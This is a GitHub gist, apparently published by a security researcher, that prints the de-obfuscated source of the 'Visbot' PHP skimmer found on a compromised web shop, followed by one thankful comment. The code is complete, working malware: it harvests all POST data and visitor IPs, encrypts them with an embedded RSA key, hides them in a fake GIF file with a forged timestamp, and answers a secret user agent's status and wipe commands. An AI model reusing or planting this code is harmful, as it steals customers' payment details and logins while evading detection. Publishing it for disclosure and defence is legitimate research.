Skip to content

Instantly share code, notes, and snippets.

@gwillem gwillem/visbot-beautified.php
Last active Aug 3, 2017

Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
visbot-beautified.php
Raw
visbot-beautified.php
<?PHP
$y0 = '/var/www/vhosts/redacted.nl/httpdocs/skin/adminhtml/default/default/images/left_button_back.gif';
$m1 = '1382961301';
$k2 = 'pa89785e';
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') {
if (isset($_GET[$k2])) {
$m1 = file_exists($y0) ? @filemtime($y0) : $m1;
@file_put_contents($y0, '');
@touch($y0, $m1, $m1);
echo 'clean ok';
} else
echo 'Pong';
exit;
}
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$i4 = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$i4 = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$i4 = @$_SERVER['REMOTE_ADDR'];
}
if (isset($_POST) && sizeof($_POST)) {
$a5 = '';
foreach ($_POST as $h6 => $n7) {
if (is_array($n7)) {
foreach ($n7 as $f8 => $l9) {
if (is_array($l9)) {
foreach ($l9 as $l10 => $v11) {
if (is_array($v11)) {
;
} else {
$a5 .= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11;
}
}
} else {
$a5 .= ':' . $h6 . '[' . $f8 . ']=' . $l9;
}
}
} else {
$a5 .= ':' . $h6 . '=' . $n7;
}
}
$a5 = $i4 . $a5;
} else {
$a5 = null;
}
if ($a5) {
$t12 = false;
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) {
$t12 = true;
} elseif (function_exists('dl')) {
$n13 = strtolower(substr(php_uname(), 0, 3));
$d14 = 'php_openssl.' . ($n13 == 'win' ? 'dll' : 'so');
@dl($d14);
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) {
$t12 = true;
}
}
if ($t12) {
$t15 = @openssl_get_publickey($k3);
$q16 = 128;
$t17 = '';
$h18 = md5(md5(microtime()) . rand());
$e19 = $h18;
while ($e19) {
$f20 = substr($e19, 0, $q16);
$e19 = substr($e19, $q16);
@openssl_public_encrypt($f20, $h21, $t15);
$t17 .= $h21;
}
$t22 = @openssl_encrypt($a5, 'aes128', $h18);
@openssl_free_key($t15);
$a5 = $t17 . ':::SEP:::' . $t22;
}
$m1 = file_exists($y0) ? @filemtime($y0) : $m1;
@file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5), FILE_APPEND);
@touch($y0, $m1, $m1);
}
?><?php
@invalidquery

This comment has been minimized.

Sign in to view
Copy link

invalidquery commented Dec 2, 2016

Thank you for publicizing this Willem, keep up the great research work!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.